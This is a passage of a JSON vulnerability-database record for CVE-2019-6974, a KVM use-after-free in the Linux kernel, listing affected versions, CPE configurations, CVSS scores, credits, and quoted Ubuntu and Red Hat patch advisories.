        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.98"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.3"
      },
      {
        "model": "kernel 3.14-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.7"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "107127"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-001392"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6974"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.20.8",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.64",
                "versionStartIncluding": "3.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.18.136",
                "versionStartIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.176",
                "versionStartIncluding": "3.19",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.156",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.99",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.21",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "15.1.0",
                "versionStartIncluding": "15.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-6974"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Google Security Research,Red Hat,The vendor reported this issue.,Jann Horn",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-612"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-6974",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 6.8,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2019-6974",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-158409",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.2,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.1,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-6974",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-6974",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201902-612",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-158409",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-6974",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-158409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-6974"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-001392"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-612"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-6974"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "In the Linux kernel before 4.20.8, kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandles reference counting because of a race condition, leading to a use-after-free. Linux kernel Contains a race condition vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Linux kernel is prone to a security bypass vulnerability. \nAttackers can exploit this issue to bypass security restrictions to perform unauthorized actions; this may aid in launching further attacks. \nVersions prior to Linux kernel 4.20.8 are vulnerable. ==========================================================================\nUbuntu Security Notice USN-3930-2\nApril 02, 2019\n\nlinux-hwe, linux-azure vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \nThis update provides the corresponding updates for the Linux Hardware\nEnablement (HWE) kernel from Ubuntu 18.10 for Ubuntu 18.04 LTS. \n\nMathias Payer and Hui Peng discovered a use-after-free vulnerability in the\nAdvanced Linux Sound Architecture (ALSA) subsystem. A physically proximate\nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an information\nleak in the Bluetooth implementation of the Linux kernel. An attacker\nwithin Bluetooth range could use this to expose sensitive information\n(kernel memory). An attacker in a guest VM with\naccess to /dev/kvm could use this to cause a denial of service (guest VM\ncrash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free vulnerability in\nthe KVM subsystem of the Linux kernel, when using nested virtual machines. \nA local attacker in a guest VM could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code in the host system. \n(CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability existed in\nthe KVM subsystem of the Linux kernel, when nested virtualization is used. \nA local attacker could use this to expose sensitive information (host\nsystem memory to a guest VM). (CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel was\ninsufficiently hardened against Spectre V1 attacks. A local attacker could\nuse this to expose sensitive information. (CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the user-\nspace API for crypto (af_alg) implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate memory\nwhen handling certain errors while reading files. A local attacker could\nuse this to cause a denial of service (excessive memory consumption). A local attacker with access to the\nIPMI character device files could use this to cause a denial of service\n(system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux kernel\nperformed insufficient ASN.1 length checks. An attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel did\nnot properly check for the mmap minimum address in some situations. A local\nattacker could use this to assist exploiting a kernel NULL pointer\ndereference vulnerability. (CVE-2019-9213)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 18.04 LTS:\n  linux-image-4.18.0-1014-azure   4.18.0-1014.14~18.04.1\n  linux-image-4.18.0-17-generic   4.18.0-17.18~18.04.1\n  linux-image-4.18.0-17-generic-lpae  4.18.0-17.18~18.04.1\n  linux-image-4.18.0-17-lowlatency  4.18.0-17.18~18.04.1\n  linux-image-4.18.0-17-snapdragon  4.18.0-17.18~18.04.1\n  linux-image-azure               4.18.0.1014.13\n  linux-image-generic-hwe-18.04   4.18.0.17.67\n  linux-image-generic-lpae-hwe-18.04  4.18.0.17.67\n  linux-image-lowlatency-hwe-18.04  4.18.0.17.67\n  linux-image-snapdragon-hwe-18.04  4.18.0.17.67\n  linux-image-virtual-hwe-18.04   4.18.0.17.67\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2019:0818-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2019:0818\nIssue date:        2019-04-23\nCVE Names:         CVE-2019-6974 CVE-2019-7221\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. \n\nSecurity Fix(es):\n\n* Kernel: KVM: potential use-after-free via kvm_ioctl_create_device()\n(CVE-2019-6974)\n\n* Kernel: KVM: nVMX: use-after-free of the hrtimer for emulation of the\npreemption timer (CVE-2019-7221)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* rbd: avoid corruption on partially completed bios [rhel-7.6.z]\n(BZ#1672514)\n\n* xfs_vm_writepages deadly embrace between kworker and user task. \n[rhel-7.6.z] (BZ#1673281)\n\n* Offload Connections always get vlan priority 0 [rhel-7.6.z] (BZ#1673821)\n\n* [NOKIA] RHEL sends flood of Neighbour Solicitations under specific\nconditions [rhel-7.6.z] (BZ#1677179)\n\n* RHEL 7.6 - Host crash occurred on NVMe/IB system while running controller\nreset [rhel-7.6.z] (BZ#1678214)\n\n* [rhel7] raid0 md workqueue deadlock with stacked md devices [rhel-7.6.z]\n(BZ#1678215)\n\n* [PureStorage7.6]nvme disconnect following an unsuccessful Admin queue\ncreation causes kernel panic [rhel-7.6.z] (BZ#1678216)\n\n* RFC: Regression with -fstack-check in \u0027backport upstream large stack\nguard patch to RHEL6\u0027 patch [rhel-7.6.z] (BZ#1678221)\n\n* [Hyper-V] [RHEL 7.6]hv_netvsc: Fix a network regression after ifdown/ifup\n[rhel-7.6.z] (BZ#1679997)\n\n* rtc_cmos: probe of 00:01 failed with error -16 [rhel-7.6.z] (BZ#1683078)\n\n* ACPI WDAT watchdog update [rhel-7.6.z] (BZ#1683079)\n\n* high ovs-vswitchd CPU usage when VRRP over VXLAN tunnel causing qrouter\nfail-over [rhel-7.6.z] (BZ#1683093)\n\n* Openshift node drops outgoing POD traffic due to NAT hashtable race in\n__ip_conntrack_confirm() [rhel-7.6.z] (BZ#1686766)\n\n* [Backport] [v3,2/2] net: igmp: Allow user-space configuration of igmp\nunsolicited report interval [rhel-7.6.z] (BZ#1686771)\n\n* [RHEL7.6]: Intermittently seen FIFO parity error on T6225-SO adapter\n[rhel-7.6.z] (BZ#1687487)\n\n* The number of unsolict report about IGMP is incorrect [rhel-7.6.z]\n(BZ#1688225)\n\n* RDT driver causing failure to boot on AMD Rome system with more than 